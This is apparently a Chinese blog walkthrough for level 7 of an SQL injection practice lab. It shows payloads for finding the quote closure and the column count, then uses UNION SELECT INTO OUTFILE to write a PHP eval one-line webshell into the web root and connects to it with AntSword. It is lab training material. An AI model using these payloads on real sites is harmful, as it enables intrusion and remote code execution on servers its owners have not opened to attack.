SQL靶场第七关攻略

一.判断闭合点

闭合点为?id=1'))--+

二.判断列数

输入?id=1')) order by 3--+页面正常

输入?id=1')) order by 4--+页面异常,说明有3列

这里显示让我们用outfile来打这关,那我们先了解一下outfile:

用法:select 列名 from table where语句 into outfile '目标文件'

三.写入木马文件

输入?id=-1')) union select 1,2,3 into outfile "D:/phpstudy/phpstudy_pro/WWW/1.txt"--+测试一下是否能把文件写进去

在这里发现写进来以后,就可以写我们的木马文件

输入?id=-1')) union select 1,2,'<?php eval($_post'cmd')?>' into outfile "D:/phpstudy/phpstudy_pro/WWW/1.php"--+

这样就把我们的木马文件写进来了,我们打开蚁剑连接

连上蚁剑就获得了他的数据库的管理权限了,以上就是第七关的通关攻略

相关推荐
Databend6 分钟前
从湖仓升级为 Agent 时代的数据控制面,Snowflake 和 Databricks 有哪些布局
大数据·数据库·agent
ClouGence3 小时前
SQL Server CDC 能放到 Always On 备库读吗?一文讲透原理与实践
数据库·sql server
先吃饱再说20 小时前
存储的进化:从 MySQL 到浏览器缓存,数据到底住在哪?
数据库
Nturmoils21 小时前
字段太多看不全,ksql 的展开模式和输出控制怎么用
数据库·后端
Databend1 天前
Agent 轨迹分析与归因的数据工程实践
大数据·数据库·agent
这个DBA有点耶1 天前
SQL改写进阶:标量子查询的“隐形代价”与消除实战
数据库·mysql·架构
smallyoung1 天前
数据库乐观锁深度解析:MySQL、PostgreSQL 实战 + Spring Boot 集成指南
数据库·mysql·postgresql
parade岁月1 天前
MySQL JOIN解析:朴实无华但食之有味
数据库·后端
用户3169353811831 天前
MySQL服务无法启动问题解决全记录
数据库
vivo互联网技术1 天前
从 10 分钟到 1 秒:ES 深度分页任意跳页的三轮优化实战
服务器·数据库·redis·elasticsearch·深度分页